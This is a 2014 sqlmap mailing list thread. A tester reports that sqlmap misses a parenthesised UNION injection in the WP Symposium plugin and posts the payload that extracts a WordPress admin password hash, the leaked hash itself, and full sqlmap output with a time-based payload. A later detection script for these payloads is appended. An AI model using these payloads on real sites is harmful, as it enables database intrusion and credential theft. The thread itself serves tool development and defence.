Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
From: Brandon P. <bpe...@gm...> - 2014-12-15 17:01:26
Here is the console output. Attached is the traffic log in a zip:

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt

         _
 ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:56:27

[08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
[08:56:27] [INFO] setting file for logging HTTP traffic
[08:56:27] [INFO] flushing session file
[08:56:27] [INFO] testing connection to the target URL
[08:56:27] [INFO] heuristics detected web page charset 'ascii'
[08:56:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
[08:56:28] [INFO] target URL is stable
[08:56:28] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
[08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
[08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:56:28] [WARNING] reflective value(s) found and filtering out
[08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)'
[08:58:08] [INFO] testing 'MySQL inline queries'
[08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:58:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
[08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[08:58:54] [INFO] checking if the injection point on POST parameter 'tray' is a false positive
POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 2049 HTTP(s) requests:
---
Parameter: tray (POST)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=getMailMessage&tray=in_deleted AND 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
---
[08:59:48] [INFO] testing MySQL
[08:59:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[08:59:51] [INFO] confirming MySQL
[08:59:53] [INFO] adjusting time delay to 1 second due to good response times
[08:59:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[08:59:53] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'

[*] shutting down at 08:59:53

bperry@ubuntu:~/tools/sqlmap$

On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi.
>
> I don't see a reason why this form of UNION test would be any different
> than the regular used by sqlmap. Can you please send me the traffic file
> for such run (... --flush-session -t traffic.txt) along with console
> output?
>
> Bye
>
> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
>
>> Hello!
>>
>> Playing around with the following vulnerability:
>>
>> http://www.exploit-db.com/exploits/35505/
>>
>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
>> result in a response from the server with the hash of the first user:
>>
>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>
>> However, sqlmap only finds a time based injection. Looking at sqlmap
>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>> CONCAT(blah, blah, blah) FROM blah).
>>
>> Just a thought!

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
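A detection-side illustration of the point raised in this thread, added here and not part of the mailing list exchange or of sqlmap: the script below scans URL-encoded POST bodies for the two payload shapes visible above, keeping a separate rule for the parenthesised "UNION (SELECT" form because a rule written for "UNION SELECT" with whitespace between the keywords does not match it. The sample bodies are constructed; no request path or log format is assumed.

```python
import re
from urllib.parse import parse_qs

# Signatures for the payload shapes shown in the thread. The parenthesised UNION
# form gets its own rule: a rule that only accepts whitespace between UNION and
# SELECT (the shape most detection rules look for) does not match "UNION (SELECT".
SIGNATURES = {
    "union_select_classic": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "union_select_parenthesised": re.compile(r"\bUNION\s*\(\s*SELECT\b", re.I),
    "time_based_benchmark": re.compile(r"\bBENCHMARK\s*\(\s*\d+\s*,", re.I),
}


def classify_body(raw_body: str) -> dict:
    """Decode a URL-encoded POST body and return {parameter: [matched signatures]}.

    parse_qs does the percent and plus decoding, so a payload hidden behind %28
    or '+' is inspected in its decoded form, not in the bytes the server logged.
    """
    hits = {}
    for name, values in parse_qs(raw_body, keep_blank_values=True).items():
        for value in values:
            tags = [tag for tag, rx in SIGNATURES.items() if rx.search(value)]
            if tags:
                hits.setdefault(name, []).extend(tags)
    return hits


def scan(bodies):
    """Return [(line_number, hits)] for every body that matched at least one rule."""
    return [(i, h) for i, body in enumerate(bodies, 1) if (h := classify_body(body))]


# Constructed sample POST bodies (not captured traffic), URL-encoded as a request
# logger would record them: a benign request, the PoC's parenthesised UNION, the
# sqlmap time-based payload from the console output, and a classic UNION SELECT.
SAMPLE_BODIES = [
    "action=getMailMessage&tray=in_deleted&mid=1",
    "action=getMailMessage&tray=in_deleted+%3D+1+UNION+%28SELECT+user_pass+FROM"
    "+wp_users+WHERE+ID%3D1%29+LIMIT+1%2C+1+--+&mid=1",
    "action=getMailMessage&tray=in_deleted+AND+9095%3DBENCHMARK%285000000%2C"
    "MD5%280x6e434246%29%29--+QPnA&mid=1",
    "action=getMailMessage&tray=in_deleted+UNION+ALL+SELECT+1--+&mid=1",
]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_BODIES):
        print(f"body {line_no}: {hits}")
```

The second sample is the one a "UNION SELECT"-only rule would silently pass, which is the same gap the thread reports in sqlmap's UNION tests.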